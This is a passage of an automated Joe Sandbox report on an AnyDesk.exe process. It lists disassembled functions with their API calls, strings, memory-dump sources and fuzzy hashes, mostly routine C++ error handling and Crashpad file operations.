                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 88ca931c0d353afd6c3bcd1fc43686e60308509325d1c492f5dbffbf18fc9975
                                                                                                                                                                                                                                                  • Instruction ID: 5c5fe0ad0c539e4f52a7caa0980522d76e9a03004aae3fbf4b127834e051f1e1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88ca931c0d353afd6c3bcd1fc43686e60308509325d1c492f5dbffbf18fc9975
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C351D0367047149FD724CE6CF99095AB7E9FF947687104A2FE495CB250EB31E84087B1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C277C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2793F
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C27949
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 2e24a158de6120b47befaffccdb227417539d0c12729c52d986d9cecd8e4777f
                                                                                                                                                                                                                                                  • Instruction ID: bc01b12c92098c2dfd23724675cfbceca225e8d3d353a0ba2f16286a08ca7ecf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e24a158de6120b47befaffccdb227417539d0c12729c52d986d9cecd8e4777f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D951D132B002149FD724CE1CF8C0A5EB7A6FF91744B604A2AE5A5DB681F731F850DBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4D347 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\WinNet\AnyDesk.exe,00000104), ref: 69C4D387
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4D452
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4D45C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                  • API String ID: 2506810119-3295360309
                                                                                                                                                                                                                                                  • Opcode ID: a437fc903e06646d58fd2a747e65bcd99371aa188e788aa49301f5e2baa2c5d5
                                                                                                                                                                                                                                                  • Instruction ID: 4204d4a3b3922af1b5a02776b8c6c9303fb100e66ee71066e3e979fc64a3f5a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a437fc903e06646d58fd2a747e65bcd99371aa188e788aa49301f5e2baa2c5d5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A318475B00658EFDB11EF99A980D9EBBFCEF85B14F109067E90497210E770AA41CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C26910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C26A09
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C26A13
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 35d1c9ec29735bdf79bd5aa469609318a87ea68aac3edde3b2fb76fe2b7b746d
                                                                                                                                                                                                                                                  • Instruction ID: d4bba0d876c074bc56d01e44c4e995e3150304278bffe725f3ea2fffeee81e02
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35d1c9ec29735bdf79bd5aa469609318a87ea68aac3edde3b2fb76fe2b7b746d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E31C731304A149FD720DF5CF980A5EB7A9FBD1654B208A2FE591CB281EB71E84087B1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C21F20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C21F48
                                                                                                                                                                                                                                                    • Part of subcall function 69C21E30: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 69C21E54
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,00000004,00000003,00000000,00000004,00000080,00000000), ref: 69C21F81
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,00000004,00000003,00000000,00000004,00000080,00000000,?,debug.log), ref: 69C22032
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Create$ModuleName
                                                                                                                                                                                                                                                  • String ID: debug.log
                                                                                                                                                                                                                                                  • API String ID: 253491666-600467936
                                                                                                                                                                                                                                                  • Opcode ID: 966b0ca99fd6fc329b00ebd1bd4be4e1cb19aac0ce830fdc2ca2ab1e66ab7bfc
                                                                                                                                                                                                                                                  • Instruction ID: c283b848fcf895a94a001e33dff8df5103c3f0ef5c7699549c8088b7ab58e0be
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 966b0ca99fd6fc329b00ebd1bd4be4e1cb19aac0ce830fdc2ca2ab1e66ab7bfc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C341A2B0A10204AFDF04DFA4EC95B6E77B5BB05714F608219E911AB2E0EB759506CB51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C24F30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2501A
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C25024
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 4bb33e8f92131215e140b279356e643ccca0c4ae7f2480547ce595bf17f9e54c
                                                                                                                                                                                                                                                  • Instruction ID: 4bae741cdcd4619dc71fde3e3be55d64476f595c013875d6236808ef9820330d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bb33e8f92131215e140b279356e643ccca0c4ae7f2480547ce595bf17f9e54c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F31DD323002509FE724CE6CFC80E5EB7A9FFD5761B604A2EE552CB681E371D84087A2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C64306 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C64392
                                                                                                                                                                                                                                                  • DeleteFile , xrefs: 69C643C1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                  • String ID: DeleteFile $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 2018770650-2174402464
                                                                                                                                                                                                                                                  • Opcode ID: 1d0a7c1996e12958f8da5b2cd6dd7913755a6a57a2153ac9c325659cb9402e2c
                                                                                                                                                                                                                                                  • Instruction ID: 4d4f1e228a18f73d3f5d129f77c88323dca11adf859e541954b845cdeaf10f59
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d0a7c1996e12958f8da5b2cd6dd7913755a6a57a2153ac9c325659cb9402e2c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B316076E00209AADB14DFA4FCE5FAEB7B8EF14314F10902AF511A7190FB359A45CA50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C645DD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C6674E: CloseHandle.KERNEL32(000000FF,?,00000000), ref: 69C66761
                                                                                                                                                                                                                                                    • Part of subcall function 69C6674E: GetLastError.KERNEL32(?,00000000), ref: 69C6677A
                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 69C64612
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C64631
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C6463D
                                                                                                                                                                                                                                                  • DeleteFile , xrefs: 69C6466F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseDeleteFileHandle
                                                                                                                                                                                                                                                  • String ID: DeleteFile $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 1758595503-2174402464
                                                                                                                                                                                                                                                  • Opcode ID: ac7a23dda1fd5f7e629b8eb5c3cf851c28acc8a43af87614f4813d5db190ab42
                                                                                                                                                                                                                                                  • Instruction ID: 2614360b5659a8ac2601cd0a962ce0acb417e0eac7217faee118f8bf586f68db
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac7a23dda1fd5f7e629b8eb5c3cf851c28acc8a43af87614f4813d5db190ab42
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB21DE36A40208AEDB14DBA5FCA6FAE77BCEF44324F10506AE401AB1D0FB35A905C665
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C669EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __vwprintf_l.LIBCMT ref: 69C66A12
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 69C66A2F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66A3C
                                                                                                                                                                                                                                                  • CreateFile , xrefs: 69C66A6A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast__vwprintf_l
                                                                                                                                                                                                                                                  • String ID: CreateFile $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3407089876-2132845161
                                                                                                                                                                                                                                                  • Opcode ID: 5a5a9b2e9fd42225ac42d342a37bb11b3e412aa06e07a9fb6e21afad6771789d
                                                                                                                                                                                                                                                  • Instruction ID: 538f46e2b2b55a85a81429dd15b482daab7cb2373d9e7687f78213a6a107049d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a5a9b2e9fd42225ac42d342a37bb11b3e412aa06e07a9fb6e21afad6771789d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511E739A50308AEEB14DFB4FC92FAE77A8EF04324F50911AF915AB1D1FB315E048664
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C6691E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __vwprintf_l.LIBCMT ref: 69C66946
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000001C,0000001C,00000000), ref: 69C66963
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66970
                                                                                                                                                                                                                                                  • CreateFile , xrefs: 69C6699E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast__vwprintf_l
                                                                                                                                                                                                                                                  • String ID: CreateFile $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3407089876-2132845161
                                                                                                                                                                                                                                                  • Opcode ID: 4208a639f5f521797050c3503436803534c7ae48285ab3c38fb45ce2d41c79e3
                                                                                                                                                                                                                                                  • Instruction ID: 2454c4a8bceff9a339ec367394382f100c91da199f3eaeff5ef91b83aef5c2bb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4208a639f5f521797050c3503436803534c7ae48285ab3c38fb45ce2d41c79e3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02110A75A103086FEB14DBB4FD92FAE73A8EF05324F50511AF9146B1D1FB315E048664
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C32860 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • g.sec.auto_logon.clear_token.done=Alle tokens gewistad.cfg.sec.auto_logon.clear_token_tt=Ontneemt onmiddellijk het recht om een verbinding te maken van alle verbruikers die de toegangsgegevens van deze computer hebben opgeslagen.ad.cfg.sec.clear_prev_profi, xrefs: 69C328BC
                                                                                                                                                                                                                                                  • list<T> too long, xrefs: 69C328E8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: g.sec.auto_logon.clear_token.done=Alle tokens gewistad.cfg.sec.auto_logon.clear_token_tt=Ontneemt onmiddellijk het recht om een verbinding te maken van alle verbruikers die de toegangsgegevens van deze computer hebben opgeslagen.ad.cfg.sec.clear_prev_profi$list<T> too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-1106650552
                                                                                                                                                                                                                                                  • Opcode ID: 50a58e752218330cb23fbdf43fe452ed953a28ecd89f1439005cae73d1bfd278
                                                                                                                                                                                                                                                  • Instruction ID: 1f2ee8c7644ecd2ff6342e72f239f4ce3497112d5b0c4c344368fc547eb6f6d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50a58e752218330cb23fbdf43fe452ed953a28ecd89f1439005cae73d1bfd278
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8119E76A002299BCB10CF98E580989F7F5FF89710B55C6A9DD08AB304E731ED06CBD2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C63E20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • UnlockFileEx.KERNEL32(?,00000000,?,?,?), ref: 69C63E55
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,?), ref: 69C63E6E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C63E7B
                                                                                                                                                                                                                                                  • UnlockFileEx, xrefs: 69C63E8E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
